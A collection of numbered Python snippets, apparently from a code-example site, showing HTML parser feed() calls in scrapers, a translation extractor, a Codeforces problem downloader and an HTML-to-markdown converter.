    if not platform:
        platform = simc_platform()
        if not platform:
            # Unsupported platform, cannot answer.
            return

    listing = urlopen('http://downloads.simulationcraft.org/nightly/?C=M;O=D'
                      ).read().decode('utf-8')
    parser = LinkParser()
    parser.feed(listing)

    # Parse the filenames
    for link in parser.links:
        v = _PACKAGE_RE.match(link)
        if not v:
            continue
        if major_ver == v.group('version') and platform == v.group('platform'):
            return (v.group('filename'), v.group('git_commit'))
Example #43
def parse_indeed_offers():
    offer_entries = []
    parser = IndeedParser()
    url = "/emplois?q=informatique&l=Rennes+(35)&radius=5&jt=internship&sort=date"
    indeed_connection = http.client.HTTPConnection("www.indeed.fr")
    indeed_connection.connect()
    indeed_connection.request("GET", url)
    indeed_response = indeed_connection.getresponse()
    parser.feed(indeed_response.read().decode("utf-8"))
    indeed_connection.close()
    next_urls = copy.deepcopy(parser.next_pages)
    offer_entries = offer_entries + parser.offer_entries
    for next_url in next_urls:
        parser = IndeedParser()
        indeed_connection = http.client.HTTPConnection("www.indeed.fr")
        indeed_connection.connect()
        indeed_connection.request("GET", next_url)
        indeed_response = indeed_connection.getresponse()
        if indeed_response.getcode() == 301:
            actual_url = indeed_response.getheader("Location")
            indeed_connection.close()
            if actual_url is None:
                continue
            indeed_connection = http.client.HTTPConnection("www.indeed.fr")
            indeed_connection.connect()
            indeed_connection.request("GET", actual_url)
            indeed_response = indeed_connection.getresponse()
        page = indeed_response.read().decode("utf-8")
        parser.feed(page)
        indeed_connection.close()
        offer_entries = offer_entries + parser.offer_entries
    return offer_entries
Example #44
def extract_angular(fileobj, keywords, comment_tags, options):
    """Extract messages from angular template (HTML) files.

    It extracts messages from angular template (HTML) files that use
    angular-gettext translate directive as per
    https://angular-gettext.rocketeer.be/

    :param fileobj: the file-like object the messages should be extracted
                    from
    :param keywords: This is a standard parameter so it is accepted but ignored.

    :param comment_tags: This is a standard parameter so it is accepted but
                        ignored.
    :param options: Another standard parameter that is accepted but ignored.
    :return: an iterator over ``(lineno, funcname, message, comments)``
             tuples
    :rtype: ``iterator``
    """

    parser = AngularGettextHTMLParser()

    for line in fileobj:
        parser.feed(encodeutils.safe_decode(line))

    for string in parser.strings:
        yield (string)
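The AngularGettextHTMLParser is not shown above; as a rough sketch (the Babel-style tuple layout of its strings attribute is an assumption), a translate-directive collector could look like this:

# Rough sketch only: the real AngularGettextHTMLParser is not shown above, and
# the (lineno, funcname, message, comments) tuple layout is an assumption.
import html.parser

class TranslateDirectiveParser(html.parser.HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.strings = []
        self._lineno = None
        self._buffer = None

    def handle_starttag(self, tag, attrs):
        # an angular-gettext element carries a bare ``translate`` attribute
        if any(name == 'translate' for name, _ in attrs):
            self._lineno = self.getpos()[0]
            self._buffer = []

    def handle_data(self, data):
        if self._buffer is not None:
            self._buffer.append(data)

    def handle_endtag(self, tag):
        if self._buffer is None:
            return
        message = ''.join(self._buffer).strip()
        if message:
            self.strings.append((self._lineno, 'gettext', message, []))
        self._buffer = None
        self._lineno = None

p = TranslateDirectiveParser()
p.feed('<span translate>Hello world</span>')
print(p.strings)  # [(1, 'gettext', 'Hello world', [])]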
Example #45
def getUrlToPdf():
    """
    Searches the delivery-service website for the menu (Speisekarte) URL:
     - scans the website for a link to the menu
     - builds the URL from the site URL and the menu reference
    :return: the assembled URL
    """

    # Fetch the website and read its HTML
    r = urlopen(_capriUrl + 'lieferservice.html')
    html = r.read().decode("utf-8")

    parser = HTMLParser()
    parser.feed(html)

    links = parser.getLinks()
    print(parser.getLinks())

    # Check all found links
    for link in links:

        # Check for link to pdf file in img folder
        if link.startswith("img/") and link.endswith(".pdf"):
            linkToPdf = _capriUrl + link
            print("Link to pdf:", linkToPdf)
            return linkToPdf

    # No link to pdf found
    return None
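The HTMLParser used here appears to be a custom subclass exposing getLinks(); an assumed minimal version that simply collects href attributes might be:

# Assumed minimal version of the link-collecting parser used above; the real
# class is not shown, so the getLinks() behaviour here is only a sketch.
import html.parser

class LinkCollector(html.parser.HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self._links = []

    def handle_starttag(self, tag, attrs):
        if tag == 'a':
            for name, value in attrs:
                if name == 'href' and value:
                    self._links.append(value)

    def getLinks(self):
        return list(self._links)

c = LinkCollector()
c.feed('<a href="img/speisekarte.pdf">Speisekarte</a>')
print(c.getLinks())  # ['img/speisekarte.pdf']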
Example #46
def download_problem(contest_uri, problem):
    problem_uri = contest_uri + '/problem/' + problem
    print('Retrieving', problem_uri, '...')
    sys.stdout.flush()
    problem_html = urllib.request.urlopen(problem_uri).read().decode('utf-8')
    print('Retrieved problem {} ({} bytes).'.format(problem,
                                                    len(problem_html)))

    # Hack for codeforces HTML errors
    problem_html = problem_html.replace('<p</p>', '<p></p>')
    problem_html = problem_html.replace('<ul</ul>', '<ul></ul>')
    problem_html = problem_html.replace('<div class="sample-test"<',
                                        '<div class="sample-test"><')

    parser = ProblemHTMLParser()
    try:
        parser.feed(problem_html)
    except:
        print(problem_html, file=sys.stderr)
        raise

    examples = parser.getExamples()

    for i, example in enumerate(examples, 1):
        input_path = INPUT_TESTCASE_FORMAT.format(problem=problem, number=i)
        write_example(input_path, example[0])

        output_path = OUTPUT_TESTCASE_FORMAT.format(problem=problem, number=i)
        write_example(output_path, example[1])

    print('Wrote {} examples for problem {}.'.format(len(examples), problem))
Example #47
def html_to_markdown(content, host):
    with open('debug/out', 'w') as f:
        f.write(content)
    parser = guildwars2_html2markdown.Htmlparser()
    parser.convert_charrefs = True
    parser.host = 'https://' + host
    content = content.replace('\n', '\n>')
    parser.feed(content)
    # content = tag_bold(content)
    # content = tag_italic(content)
    # content = tag_list(content)
    # content = tag_superscript(content)
    # content = tag_strikethrough(content)
    # content = tag_underline(content)
    # content = tag_breakrow(content)
    # content = tag_h1(content)
    # content = tag_h2(content)
    # content = tag_h3(content)
    # content = tag_h4(content)
    # content = tag_h5(content)
    # content = tag_h6(content)
    # content = tag_hr(content)
    # content = tag_screenshot(content, host)
    # content = tag_paragraph(content)
    # content = tag_iframe(content, host)
    # content = tag_href(content, host)
    # content = tag_img(content, host)
    # content = tag_quote(content, host)
    # content = tag_spoiler(content, host)
    # content = tag_object(content)
    # content = content.strip('\n')
    # content = '>' + content.replace('\n', '\n>')
    # content = tag_other(content)
    print(parser.result)
    return parser.result
Example #48
 async def __fetch_and_feed(self, client: aiohttp.client.ClientSession, url, parser: htmlParser, client_num: int):
     # logger.debug(f"client - {client_num}, try to get url <{url}>")
     resp: aiohttp.client.ClientResponse
     while True:
         async with client.get(url) as resp:
             if resp.status < 200 or resp.status >= 300:
                 logger.warning(f"server response - {resp.status}")
                 break
             try:
                 html_data = await resp.text()
             except UnicodeDecodeError as err:
                 logger.warning(err)
                 break
             # print(html_data)
             parser.feed(html_data)
             m_v = html_url_regex_3.match(url)
             if m_v is None or m_v.group(4) == "":
                 logger.warning(f"Processing url <{url}> cause an exception, url isn't correspond with content.")
                 break
             PageId = int(m_v.group(4))
             if parser.HasContent and (parser.BookName != "" and parser.BookName is not None):
                 AppendContext(parser.BookName, PageId, parser.Content)
         break
     await self.__client_list.ReleaseClient(client_num)
     return
Example #49
def tag_screenshot(content, host):
    re_sss = re.findall(r'<p class="screenshot">.*?</p>', content)
    for re_ss in re_sss:
        if re_ss != '':
            parser = p_screenshots()
            parser.feed(re_ss)
            content = content.replace(re_ss, parser._src + '\n')
    return content
Example #50
def tag_iframe(content, host):
    re_ifrs = re.findall(r'<iframe.*?src="[^"]*".*?>.*?</iframe>', content)
    for re_ifr in re_ifrs:
        if re_ifr != '':
            parser = p_iframe()
            parser.feed(re_ifr)
            content = content.replace(re_ifr, parser._src)
    return content
Example #51
 def getBuildsFromPage(self, appId, pageIndex):
 	request = urllib.request.Request("https://www.testflightapp.com/dashboard/applications/%d/builds/?page=%d" % (appId, pageIndex + 1))
 	response = self.opener.open(request);
 	htmlContent = response.read().decode('ascii')
 	parser = self.BuildsOnPageParser()
 	parser.feed(htmlContent)
 	print("Found %d builds on page %d" % (len(parser.builds), pageIndex + 1))
 	return parser.builds
Example #52
	def run(self):
		parser = Parser()
		with open(os.path.join('..','docs','docs.polserver.com','pol099','include','escriptguide.inc')) as f:
			while True:
				l = f.readline()
				if not l:
					break
				parser.feed(l)
Example #53
def search(db, terms):
    f = open(db)
    xml = f.readlines()
    f.close()
    parser = BayParser()
    parser.q = (' '.join(terms)).lower()
    parser.feed(''.join(xml))
    return parser.results
Example #54
def parse(company_number: str) -> (str, str, str):
    html = _fetch_company_data(company_number)
    if not html:
        return None

    parser = SummaryParser()
    parser.feed(html)
    return parser.company_status, parser.company_incorporated, parser.company_type
Example #55
def parse(markup):
    parser = Parser()
    parser.feed(markup)

    gen = HtmlGenerator(parser.parse_result)
    try:
        return gen.get_html()
    except CompileException as ex:
        return '<h1>Error</h1><pre>{}</pre>'.format(ex)
Example #56
 def loadPages(self,dir):
     for filename in os.listdir(dir):
         pattern = re.compile(r".*\.html")
         parser = self.WordCounter()
         if re.match(pattern,filename):
             file = open(dir+filename,'r')
             parser.feed(file.read())
             file.close()
             self.sitesDict[filename] = parser.wordCount
Example #57
 def to_json(content, raise_exception=True):
     """
     converts HTML into JSON
     @param      content             HTML content to parse
     @param      raise_exception     if True, raises an exception if the HTML is malformed, otherwise does what it can
     """
     parser = HTMLtoJSONParser(raise_exception=raise_exception)
     parser.feed(content)
     return parser.json
Example #58
 def parse_links(self):
     'Parse out the links found in the downloaded HTML file'
     # html.parser.HTMLParser no longer accepts a formatter (the old Python 2
     # htmllib/formatter API), so collect anchors with a small subclass instead.
     class AnchorParser(html.parser.HTMLParser):
         def __init__(self):
             super().__init__()
             self.anchorlist = []
         def handle_starttag(self, tag, attrs):
             if tag == 'a':
                 self.anchorlist.extend(v for k, v in attrs if k == 'href' and v)

     with open(self.file, 'r') as f:
         data = f.read()
     parser = AnchorParser()
     parser.feed(data)
     parser.close()
     return parser.anchorlist
Example #59
def scrape(path):
    request = urllib.request.Request('http://en.wikipedia.org' + path)
    request.add_header('User-agent', 'Mozilla/5.0')
    response = urllib.request.urlopen(request, timeout=10)
    parser = Parser()
    parser.feed(response.read().decode())
    return {
        key: value for key, value in parser.__dict__.items() if key in [
            'influenced', 'influenced_by', 'appeared_in']}